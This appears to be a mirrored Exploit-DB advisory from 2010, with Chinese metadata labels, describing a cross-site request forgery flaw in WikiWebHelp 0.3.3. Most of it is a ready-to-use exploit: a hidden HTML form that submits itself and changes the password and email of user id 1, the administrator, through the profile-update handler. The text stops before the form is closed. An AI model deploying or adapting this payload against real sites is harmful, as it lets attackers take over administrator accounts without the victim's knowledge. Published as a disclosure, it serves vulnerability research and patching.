WikiWebHelp 0.3.3 – Cross-Site Request Forgery

  • 作者: Yoyahack
    日期: 2010-10-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15239/
  • #Blog: yoyahack.blogspot.com
    #Site: foro.undersecurity.net
    #Mail: yoyahack@undersecurity.net
    #CMS: WikiWebHelp
    
    The entire system is vulnerable to CSRF (Cross-site request forgery) since
    this does not include a system to prevent CSRF attacks ...
    
    Example
    
    Change the password of users, including the administrator.
    
    Exploit:
    
    <form name="CSRF" method="post" action="
    http://127.0.0.1/wwh/handlers/updateprofile.php?id=1">
    <input type='hidden' name='pass' value='password'>
    <input type='hidden' name='confirm' value='confirm_password'>
    <input type='hidden' name='email' value='email'>
    <input type='hidden' name='sub' value='on'>
    <input type='hidden' name='id' value='1'>
    <input type='hidden' name='subscribe' value='true'>
    <script>document.CSRF.submit()</script>